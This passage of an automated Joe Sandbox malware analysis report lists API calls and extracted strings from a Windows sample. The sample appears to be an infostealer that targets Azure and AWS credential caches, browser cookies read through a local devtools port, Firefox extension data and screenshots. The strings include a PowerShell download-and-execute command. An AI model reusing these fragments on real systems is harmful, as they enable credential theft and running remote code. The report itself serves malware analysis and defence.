                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$memset$FolderPathlstrcpy
                              • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 4067350539-3645552435
                              APIs
                              • lstrcpy.KERNEL32 ref: 003AABCF
                              • lstrlen.KERNEL32(00F2F388), ref: 003AABE5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAC0D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003AAC18
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAC41
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAC84
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003AAC8E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AACB7
                              • lstrlen.KERNEL32(003C4AD4), ref: 003AACD1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AACF3
                              • lstrcat.KERNEL32(00000000,003C4AD4), ref: 003AACFF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAD28
                              • lstrlen.KERNEL32(003C4AD4), ref: 003AAD3A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAD5C
                              • lstrcat.KERNEL32(00000000,003C4AD4), ref: 003AAD68
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAD91
                              • lstrlen.KERNEL32(00F2F268), ref: 003AADA7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AADCF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003AADDA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAE03
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AAE3F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003AAE49
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAE6F
                              • lstrlen.KERNEL32(00000000), ref: 003AAE85
                              • lstrcpy.KERNEL32(00000000,00F2F280), ref: 003AAEB8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen
                              • String ID: f
                              • API String ID: 2762123234-1993550816
                              APIs
                              • LoadLibraryA.KERNEL32(ws2_32.dll,?,003A72A4), ref: 003B47E6
                              • GetProcAddress.KERNEL32(00000000,connect), ref: 003B47FC
                              • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 003B480D
                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 003B481E
                              • GetProcAddress.KERNEL32(00000000,htons), ref: 003B482F
                              • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 003B4840
                              • GetProcAddress.KERNEL32(00000000,recv), ref: 003B4851
                              • GetProcAddress.KERNEL32(00000000,socket), ref: 003B4862
                              • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 003B4873
                              • GetProcAddress.KERNEL32(00000000,closesocket), ref: 003B4884
                              • GetProcAddress.KERNEL32(00000000,send), ref: 003B4895
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                              • API String ID: 2238633743-3087812094
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003ABE53
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003ABE86
                              • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003ABE91
                              • lstrcpy.KERNEL32(00000000,?), ref: 003ABEB1
                              • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003ABEBD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABEE0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003ABEEB
                              • lstrlen.KERNEL32(')"), ref: 003ABEF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABF13
                              • lstrcat.KERNEL32(00000000,')"), ref: 003ABF1F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABF46
                              • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003ABF66
                              • lstrcpy.KERNEL32(00000000,?), ref: 003ABF88
                              • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003ABF94
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABFBA
                              • ShellExecuteEx.SHELL32(?), ref: 003AC00C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 4016326548-898575020
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B184F
                              • lstrlen.KERNEL32(00F16E90), ref: 003B1860
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1887
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003B1892
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B18C1
                              • lstrlen.KERNEL32(003C4FA0), ref: 003B18D3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B18F4
                              • lstrcat.KERNEL32(00000000,003C4FA0), ref: 003B1900
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B192F
                              • lstrlen.KERNEL32(00F16EC0), ref: 003B1945
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B196C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003B1977
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B19A6
                              • lstrlen.KERNEL32(003C4FA0), ref: 003B19B8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B19D9
                              • lstrcat.KERNEL32(00000000,003C4FA0), ref: 003B19E5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A14
                              • lstrlen.KERNEL32(00F16F00), ref: 003B1A2A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A51
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003B1A5C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A8B
                              • lstrlen.KERNEL32(00F16F20), ref: 003B1AA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1AC8
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003B1AD3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1B02
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen
                              • String ID:
                              • API String ID: 1049500425-0
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A4793
                              • LocalAlloc.KERNEL32(00000040,?), ref: 003A47C5
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4812
                              • lstrlen.KERNEL32(003C4B60), ref: 003A481D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A483A
                              • lstrcat.KERNEL32(00000000,003C4B60), ref: 003A4846
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A486B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4898
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A48A3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A48CA
                              • StrStrA.SHLWAPI(?,00000000), ref: 003A48DC
                              • lstrlen.KERNEL32(?), ref: 003A48F0
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4931
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A49B8
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A49E1
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A4A0A
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A4A30
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A4A5D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 4107348322-3310892237
                              APIs
                                • Part of subcall function 003990C0: InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 003990DF
                                • Part of subcall function 003990C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003990FC
                                • Part of subcall function 003990C0: InternetCloseHandle.WININET(00000000), ref: 00399109
                              • strlen.MSVCRT ref: 003992E1
                              • strlen.MSVCRT ref: 003992FA
                                • Part of subcall function 00398980: std::_Xinvalid_argument.LIBCPMT ref: 00398996
                              • strlen.MSVCRT ref: 00399399
                              • strlen.MSVCRT ref: 003993E6
                              • lstrcat.KERNEL32(?,cookies), ref: 00399547
                              • lstrcat.KERNEL32(?,003C1794), ref: 00399559
                              • lstrcat.KERNEL32(?,?), ref: 0039956A
                              • lstrcat.KERNEL32(?,003C4B98), ref: 0039957C
                              • lstrcat.KERNEL32(?,?), ref: 0039958D
                              • lstrcat.KERNEL32(?,.txt), ref: 0039959F
                              • lstrlen.KERNEL32(?), ref: 003995B6
                              • lstrlen.KERNEL32(?), ref: 003995DB
                              • lstrcpy.KERNEL32(00000000,?), ref: 00399614
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                              • API String ID: 1201316467-3542011879
                              • Opcode ID: 8c83faa61bbb01270207aedae7e3e777a2cca32b5ac3bc42e8cb1f525b2f03a6
                              • Instruction ID: 8a3187d46f8063a60adb99c40e43dec2a42e4a4eefe0a53f4d8f02c9ee863879
                              • Opcode Fuzzy Hash: 8c83faa61bbb01270207aedae7e3e777a2cca32b5ac3bc42e8cb1f525b2f03a6
                              • Instruction Fuzzy Hash: B6E11471E11218EFDF12DFA8D885BDEBBB5BF48300F1044AAE509A7241DB70AE45CB95
                              APIs
                              • memset.MSVCRT ref: 003AD9A1
                              • memset.MSVCRT ref: 003AD9B3
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AD9DB
                              • lstrcpy.KERNEL32(00000000,?), ref: 003ADA0E
                              • lstrcat.KERNEL32(?,00000000), ref: 003ADA1C
                              • lstrcat.KERNEL32(?,00F2F670), ref: 003ADA36
                              • lstrcat.KERNEL32(?,?), ref: 003ADA4A
                              • lstrcat.KERNEL32(?,00F2DA98), ref: 003ADA5E
                              • lstrcpy.KERNEL32(00000000,?), ref: 003ADA8E
                              • GetFileAttributesA.KERNEL32(00000000), ref: 003ADA95
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003ADAFE
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2367105040-0
                              • Opcode ID: a708292d9a5ee2c14a076dba10e22839f3b700a01096cd4dfcf580e215855533
                              • Instruction ID: b1543c71834db903fd512f1a941f0e5963fa0d610ee7fec1c1e2e7766563a2d6
                              • Opcode Fuzzy Hash: a708292d9a5ee2c14a076dba10e22839f3b700a01096cd4dfcf580e215855533
                              • Instruction Fuzzy Hash: 7EB19EB2910659AFCF12EFA4DC889EE77B9FF49300F054569E906E7250DB309E49CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039B330
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B37E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B3A9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039B3B1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B3D9
                              • lstrlen.KERNEL32(003C4C50), ref: 0039B450
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B474
                              • lstrcat.KERNEL32(00000000,003C4C50), ref: 0039B480
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B4A9
                              • lstrlen.KERNEL32(00000000), ref: 0039B52D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B557
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039B55F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B587
                              • lstrlen.KERNEL32(003C4AD4), ref: 0039B5FE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B622
                              • lstrcat.KERNEL32(00000000,003C4AD4), ref: 0039B62E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B65E
                              • lstrlen.KERNEL32(?), ref: 0039B767
                              • lstrlen.KERNEL32(?), ref: 0039B776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B79E
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: e064fe6938770e434da60fb0de6bde7647be707e3c5d3d9a10b6211d65370111
                              • Instruction ID: a1705d176a3d4634c2c334326bb6c95ab645581bb409427e443ca518d306efa7
                              • Opcode Fuzzy Hash: e064fe6938770e434da60fb0de6bde7647be707e3c5d3d9a10b6211d65370111
                              • Instruction Fuzzy Hash: 56023D31A01606DFCF26DF65EA89B6AF7F5AF54304F1A806DE4099B261DB31DC46CB80
                              APIs
                                • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                              • RegOpenKeyExA.ADVAPI32(?,00F2BF20,00000000,00020019,?), ref: 003B37BD
                              • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 003B37F7
                              • wsprintfA.USER32 ref: 003B3822
                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 003B3840
                              • RegCloseKey.ADVAPI32(?), ref: 003B384E
                              • RegCloseKey.ADVAPI32(?), ref: 003B3858
                              • RegQueryValueExA.ADVAPI32(?,00F2F2C8,00000000,000F003F,?,?), ref: 003B38A1
                              • lstrlen.KERNEL32(?), ref: 003B38B6
                              • RegQueryValueExA.ADVAPI32(?,00F2F298,00000000,000F003F,?,00000400), ref: 003B3927
                              • RegCloseKey.ADVAPI32(?), ref: 003B3972
                              • RegCloseKey.ADVAPI32(?), ref: 003B3989
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 13140697-3278919252
                              • Opcode ID: 77ff527ca365cbead0f21d46a64287350f3ea25de6fc34a5e71272293c79b25e
                              • Instruction ID: e0e2fc74a45a3f3dc35e87259cd0d9bfaf6e11fd2eb8cae3db18af52b2dd5e37
                              • Opcode Fuzzy Hash: 77ff527ca365cbead0f21d46a64287350f3ea25de6fc34a5e71272293c79b25e
                              • Instruction Fuzzy Hash: 7491BD729002189FCB11DFA4CC85EEEB7B9FF88314F158569E609AB611DB31AE45CF90
                              APIs
                              • InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 003990DF
                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003990FC
                              • InternetCloseHandle.WININET(00000000), ref: 00399109
                              • InternetReadFile.WININET(?,?,?,00000000), ref: 00399166
                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00399197
                              • InternetCloseHandle.WININET(00000000), ref: 003991A2
                              • InternetCloseHandle.WININET(00000000), ref: 003991A9
                              • strlen.MSVCRT ref: 003991BA
                              • strlen.MSVCRT ref: 003991ED
                              • strlen.MSVCRT ref: 0039922E
                              • strlen.MSVCRT ref: 0039924C
                                • Part of subcall function 00398980: std::_Xinvalid_argument.LIBCPMT ref: 00398996
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                              • API String ID: 1530259920-2144369209
                              • Opcode ID: e7c126f6a12734e68ce3f4c0d34f1ac6b8c5b0e2fa096a52742c6b2af67fb166
                              • Instruction ID: 2e9da2004521bb6d3203d8c1a5719e4f75316259c38f9ff0d32c908943cfec2b
                              • Opcode Fuzzy Hash: e7c126f6a12734e68ce3f4c0d34f1ac6b8c5b0e2fa096a52742c6b2af67fb166
                              • Instruction Fuzzy Hash: 1451E571610209ABDB21DFA8DC45FEEF7F9EB44710F140469F545E7280DBB49E4887A1
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 003B16A1
                              • lstrcpy.KERNEL32(00000000,00F1A450), ref: 003B16CC
                              • lstrlen.KERNEL32(?), ref: 003B16D9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B16F6
                              • lstrcat.KERNEL32(00000000,?), ref: 003B1704
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B172A
                              • lstrlen.KERNEL32(00F2ED90), ref: 003B173F
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B1762
                              • lstrcat.KERNEL32(00000000,00F2ED90), ref: 003B176A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1792
                              • ShellExecuteEx.SHELL32(?), ref: 003B17CD
                              • ExitProcess.KERNEL32 ref: 003B1803
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                              • String ID: <
                              • API String ID: 3579039295-4251816714
                              • Opcode ID: 7c3c69ffa7a44a8a471912c84cb4bafcb40ab63054a3b77d618b4bdc1947bbc0
                              • Instruction ID: 49026b5af6de7848f447f60593de6a1cd97d4a936e74a44478f7aee095ad4053
                              • Opcode Fuzzy Hash: 7c3c69ffa7a44a8a471912c84cb4bafcb40ab63054a3b77d618b4bdc1947bbc0
                              • Instruction Fuzzy Hash: A651A171A01A1AAFCB12DFA4CC99ADEB7F9AF54300F454125E605E7251DF30AE05CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AEFE4
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AF012
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003AF026
                              • lstrlen.KERNEL32(00000000), ref: 003AF035
                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 003AF053
                              • StrStrA.SHLWAPI(00000000,?), ref: 003AF081
                              • lstrlen.KERNEL32(?), ref: 003AF094
                              • lstrlen.KERNEL32(00000000), ref: 003AF0B2
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 003AF0FF
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 003AF13F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$AllocLocal
                              • String ID: ERROR
                              • API String ID: 1803462166-2861137601
                              • Opcode ID: ee5b8604cd59b7c91161beb9847676a871656cd5fa3b0780f7ea335d06301ecc
                              • Instruction ID: 8d9a2fc1dd86a513172436172ea29d5ebd9c77c5b2dac971591f82754069d27d
                              • Opcode Fuzzy Hash: ee5b8604cd59b7c91161beb9847676a871656cd5fa3b0780f7ea335d06301ecc
                              • Instruction Fuzzy Hash: 05515C36911905AFCB23EBB8D859EAF77A4EF56700F064568E846DB212DF30DC058B94
                              APIs
                              • GetEnvironmentVariableA.KERNEL32(00F28C48,005C9BD8,0000FFFF), ref: 0039A026
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039A053
                              • lstrlen.KERNEL32(005C9BD8), ref: 0039A060
                              • lstrcpy.KERNEL32(00000000,005C9BD8), ref: 0039A08A
                              • lstrlen.KERNEL32(003C4C4C), ref: 0039A095
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039A0B2
                              • lstrcat.KERNEL32(00000000,003C4C4C), ref: 0039A0BE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039A0E4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039A0EF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039A114
                              • SetEnvironmentVariableA.KERNEL32(00F28C48,00000000), ref: 0039A12F
                              • LoadLibraryA.KERNEL32(00F15568), ref: 0039A143
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                              • String ID:
                              • API String ID: 2929475105-0
                              • Opcode ID: 635608c8e6261c3f8a8e39ee50f378a9e6715c8a96d19e6808f882bd7901ab76
                              • Instruction ID: e1b4d25fe0fa29057e83d4dab9e5cb584e02e8b9ba38b5f6ed90fbb977a4a863
                              • Opcode Fuzzy Hash: 635608c8e6261c3f8a8e39ee50f378a9e6715c8a96d19e6808f882bd7901ab76
                              • Instruction Fuzzy Hash: 6F91B131A00E109FDF329FA4DC89E7737A5ABA4704F464658E9058B2A1EFB5DC44DBC2
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AC8A2
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AC8D1
                              • lstrlen.KERNEL32(00000000), ref: 003AC8FC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AC932
                              • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003AC943
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 9a25abfe45a0945601e4eefd249c24bc407751cbbdf7ab439662fa0c8a58d27f
                              • Instruction ID: a15ab3b5628a72714958f8384eb30de7489e33579a525c5c8a248d611bbaec30
                              • Opcode Fuzzy Hash: 9a25abfe45a0945601e4eefd249c24bc407751cbbdf7ab439662fa0c8a58d27f
                              • Instruction Fuzzy Hash: AC61B371D2161AAFDB12EFB5C849ABF7BB8FF16340F055569E841EB201DB348D058B90
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,003B0CF0), ref: 003B4276
                              • GetDesktopWindow.USER32 ref: 003B4280
                              • GetWindowRect.USER32(00000000,?), ref: 003B428D
                              • SelectObject.GDI32(00000000,00000000), ref: 003B42BF
                              • GetHGlobalFromStream.COMBASE(003B0CF0,?), ref: 003B4336
                              • GlobalLock.KERNEL32(?), ref: 003B4340
                              • GlobalSize.KERNEL32(?), ref: 003B434D
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
